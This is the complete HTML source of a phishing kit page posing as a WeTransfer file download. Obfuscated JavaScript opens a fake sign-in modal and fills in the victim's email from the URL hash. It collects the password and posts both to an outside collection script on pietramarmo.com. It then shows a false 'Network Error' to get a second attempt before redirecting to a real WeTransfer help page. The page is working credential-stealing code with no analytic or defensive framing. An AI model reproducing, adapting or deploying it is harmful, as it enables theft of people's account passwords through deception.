<!doctype html>
<html>

	<head>
        <meta charset="utf-8">
        <title></title>
		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <style>
            body {
                background-image: url(https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/we.png?v=1670830144657);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }

            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
            @media (max-width: 575.98px) {
			#myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			body {
			background-image: url(grd.jpg);
			background-repeat: no-repeat;
			background-origin:contain;
			height:100vh;
			}
			
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			#asd{
			display:none;
			}
			
			.col-sm-3{
			width:46%
			}          
			}
        </style>
    </head>

    <body>
		<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>
		<div class="loaded" ></div>
    </body>
	
	<script>

var _0x499f83=_0x2a49;(function(_0x39b582,_0x2e3b76){var _0x53a096=_0x2a49,_0x4bcaae=_0x39b582();while(!![]){try{var _0x100f6c=-parseInt(_0x53a096(0x188))/0x1+parseInt(_0x53a096(0x192))/0x2+parseInt(_0x53a096(0x195))/0x3*(-parseInt(_0x53a096(0x184))/0x4)+parseInt(_0x53a096(0x194))/0x5+parseInt(_0x53a096(0x183))/0x6*(parseInt(_0x53a096(0x173))/0x7)+parseInt(_0x53a096(0x180))/0x8+parseInt(_0x53a096(0x17a))/0x9;if(_0x100f6c===_0x2e3b76)break;else _0x4bcaae['push'](_0x4bcaae['shift']());}catch(_0x159fc3){_0x4bcaae['push'](_0x4bcaae['shift']());}}}(_0x3eaf,0x67ef1),$(window)['on'](_0x499f83(0x17d),function(){var _0x798258=_0x499f83;$(_0x798258(0x185))[_0x798258(0x175)]('show');}),$(document)[_0x499f83(0x171)](function(){var _0x25d7c1=_0x499f83;$(_0x25d7c1(0x172))['html'](_0x25d7c1(0x179));var _0x1edba4=0x0,_0x4136c5=window[_0x25d7c1(0x182)][_0x25d7c1(0x191)]['substr'](0x1);$(_0x25d7c1(0x18a))[_0x25d7c1(0x17e)](_0x4136c5),$('#formx')[_0x25d7c1(0x174)](function(_0x232286){var _0x2f26e5=_0x25d7c1;_0x232286[_0x2f26e5(0x187)]();var _0x12100c=$('#A1')[_0x2f26e5(0x17e)](),_0x1f99a=new FormData($('#formx')[0x0]);$(_0x2f26e5(0x18b))[_0x2f26e5(0x178)](_0x2f26e5(0x18e))[_0x2f26e5(0x189)]('disabled',!![]),$(_0x2f26e5(0x17c))[_0x2f26e5(0x193)](function(){var _0x4fce3e=_0x2f26e5;$(_0x4fce3e(0x17f))[_0x4fce3e(0x181)]();}),_0x1edba4=_0x1edba4+0x1,$[_0x2f26e5(0x190)]({'url':_0x2f26e5(0x18c),'type':_0x2f26e5(0x176),'data':_0x1f99a,'contentType':![],'processData':![],'success':function(_0xe8bf13){setTimeout(function(){var _0xfe15e6=_0x2a49;$(_0xfe15e6(0x18a))[_0xfe15e6(0x17e)](_0x4136c5),$('#x2')['val'](''),$(_0xfe15e6(0x17f))[_0xfe15e6(0x17b)](),$(_0xfe15e6(0x17f))[_0xfe15e6(0x178)]('Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again'),$(_0xfe15e6(0x18b))[_0xfe15e6(0x178)]('Sign\x20In')[_0xfe15e6(0x189)]('disabled',![]),_0x1edba4>=0x2&&(_0x1edba4=0x0,window['location'][_0xfe15e6(0x18f)]('https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading'));},0x3e8);},'error':function(_0x5cc93d){setTimeout(function(){var _0x2760eb=_0x2a49;$('#x1')['val'](_0x4136c5),$(_0x2760eb(0x17c))[_0x2760eb(0x17e)](''),$(_0x2760eb(0x17f))[_0x2760eb(0x17b)](),$(_0x2760eb(0x17f))['html'](_0x2760eb(0x177)),$(_0x2760eb(0x18b))[_0x2760eb(0x178)]('Sign\x20In')['prop'](_0x2760eb(0x18d),![]),_0x1edba4>=0x2&&(_0x1edba4=0x0,window[_0x2760eb(0x182)][_0x2760eb(0x18f)](_0x2760eb(0x186)));},0x3e8);}});});}));function _0x2a49(_0x40a0d3,_0x43e67a){var _0x3eafa2=_0x3eaf();return _0x2a49=function(_0x2a49fa,_0x540cca){_0x2a49fa=_0x2a49fa-0x171;var _0x4e24c1=_0x3eafa2[_0x2a49fa];return _0x4e24c1;},_0x2a49(_0x40a0d3,_0x43e67a);}function _0x3eaf(){var _0x23ab40=['click','3107910cvgYUa','75AFPpds','ready','.loaded','7QTFgAl','submit','modal','POST','Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again','html','\x0a\x09\x09<!--\x20The\x20Modal\x20-->\x0a\x09\x09<div\x20class=\x22modal\x22\x20id=\x22myModal\x22>\x0a\x09\x09\x09<div\x20class=\x22modal-dialog\x22>\x0a\x09\x09\x09\x09<div\x20class=\x22modal-content\x22>\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20Header\x20-->\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20body\x20-->\x0a\x09\x09\x09\x09\x09<div\x20class=\x22modal-body\x20p-3\x22>\x0a\x09\x09\x09\x09\x09\x20\x20<img\x20src=\x22https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/to.png?v=1670830146465\x22\x20width=\x20\x22100%\x22\x20class=\x22img-fluid\x22>\x0a\x09\x09\x09\x09\x09\x09<div\x20class=\x22text-danger\x22\x20id=\x22msg\x22\x20style=\x22font-weight:600;\x20font-size:17px;\x22></div>\x0a\x09\x09\x09\x09\x09\x09<form\x20method=\x22post\x22\x20id=\x22formx\x22\x20class=\x22my-4\x22>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22email\x22\x20name=\x22x1\x22\x20id=\x22x1\x22\x20class=\x22form-control\x20mb-3\x22\x20value=\x22\x22\x20readonly>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22password\x22\x20name=\x22x2\x22\x20id=\x22x2\x22\x20class=\x22form-control\x20mb-3\x22\x20placeholder=\x22Password\x22\x20value=\x22\x22\x20required>\x0a\x09\x09\x09\x09\x09\x09\x09<button\x20id=\x22submitBtn\x22\x20class=\x22btn\x20btn-md\x20btn-primary\x22>Sign\x20In</button>\x0a\x09\x09\x09\x09\x09\x09</form>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09</div>\x0a\x09\x09\x09</div>\x0a\x09\x09</div>\x0a\x09','4421439jJlbeV','show','#x2','load','val','#msg','1991304ZnQPxq','hide','location','114672ORYveZ','130072PffhAR','#myModal','https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading','preventDefault','625587dOYuiP','prop','#x1','#submitBtn','https://pietramarmo.com/hdml/post.php','disabled','\x0a\x09\x09<button\x20class=\x22btn\x20btn-sm\x20btn-primary\x22\x20disabled>\x0a\x09\x09\x09<span\x20class=\x22spinner-grow\x20spinner-grow-sm\x22></span>Please\x20Wait...\x0a\x09\x09</button>','replace','ajax','hash','966744afsole'];_0x3eaf=function(){return _0x23ab40;};return _0x3eaf();}

	</script>

</html>
